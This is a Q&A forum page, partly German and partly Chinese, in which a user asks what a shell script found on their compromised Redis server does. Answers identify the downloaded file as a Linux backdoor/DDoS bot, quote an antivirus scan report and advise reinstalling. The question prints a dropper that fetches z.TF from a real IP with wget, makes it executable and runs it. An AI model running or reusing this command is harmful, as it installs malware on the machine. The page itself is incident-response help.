linux – Was bedeutet dieser Hacker-Code?

Question

Heute habe ich festgestellt, dass Redis keine Verbindung zu einem Server herstellen konnte. Ich habe eine solche Anweisung auf dem Server gefunden

#!/bin/bash
zfile="/tmp/z.TF"

if [ ! -f "$zfile" ]; then  
    wget -P /tmp/ http://27.102.101.67/z.TF && chmod 777 /tmp/z.TF && /tmp/z.TF
fi

Z.TF-Datei heruntergeladen und ausgeführt. Beim Öffnen von z.TF handelt es sich um einen Bytecode. Dieses Programm kann automatisch erneut ausgeführt werden.

Derzeit ist dieser Programmprozess beendet, aber der Redis-Dienst ist immer noch nicht verfügbar. Ich weiß nicht, ob noch andere Schadprogramme übrig sind.

Kann jemand bitte den Inhalt von z.TF erklären? Und wie man damit umgeht.

Answer 1

z.TF 是个ELF格式的linux可执行文件

你服务器被装了后门，尽快重装系统，修复漏洞。
该升级的都升级一遍。

---

基本可以确定是 后门+肉鸡

VirSCAN.org Scanned Report :
Scanned time   : 2017-06-06 20:53:39
Scanner results: 10%的杀软(4/39)报告发现病毒
File Name      : z.TF
File Size      : 649640 byte
File Type      : application/x-executable
MD5            : a6f42e73365ad56ce42985c5518d7e34
SHA1           : 564d6e2c2489a6d3a9d0634f76e065be7ad28072
Online report  : http://r.virscan.org/report/15f733f9dc3e27bbd06b92171710f0e4

Scanner        Engine Ver      Sig Ver           Sig Date    Time   Scan result
AVAST!         170303-1       4.7.4             2017-03-03     46   ELF:Ddostf-A                  
SOPHOS         5.32           3.65.2            2016-10-10     8    Linux/DDoS-BE                 
奇虎360         1.0.1          1.0.1             1.0.1          4    Win32/Backdoor.34d            
江民杀毒         16.0.100       1.0.0.0           2017-06-05     2    Backdoor.Linux.wfg            

Answer 2

话说你把t.ZF的代码发上来啊

你贴出来的代码，你不是自己已经解释清楚了么